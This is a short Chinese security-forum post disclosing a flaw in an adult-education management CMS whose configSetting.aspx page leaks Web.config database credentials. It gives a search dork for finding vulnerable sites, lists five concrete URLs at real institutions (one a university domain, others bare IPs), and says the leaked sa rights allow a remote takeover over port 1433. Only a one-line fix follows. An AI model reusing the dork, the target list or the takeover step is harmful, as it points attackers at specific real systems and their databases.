某成教管理CMS系统数据库连接信息泄露下载
-
来源:黑吧安全网 浏览:1096次 时间:2014-04-29
偶然发现的,不知道是哪个公司的,看有些登录页面上写的是江西百得科技有限公司,就只好写这个了...
百度或google关键字:intitle:成教管理系统
configSetting.aspx可以查看Web.config数据库连接信息
http://cj.xmut.edu.cn/cexmut/webConfigSet/configSetting.aspx?url=/login/index.aspx
http://www.zscj.com.cn/jxjy/webConfigSet/configSetting.aspx?url=/jxjy/login/index.aspx
http://210.43.0.25/webConfigSet/configSetting.aspx?url=/login/index.aspx
http://59.74.193.139/webConfigSet/configSetting.aspx?url=/login/index.aspx
http://120.203.1.254:1083/webConfigSet/configSetting.aspx?url=/login/index.aspx
还有一些,就不一一列举了
有sa权限,可以1433外连,直接拿下
修复方案:
目录访问限制一下
下一篇: 某体彩系统存在SQL注射漏洞下载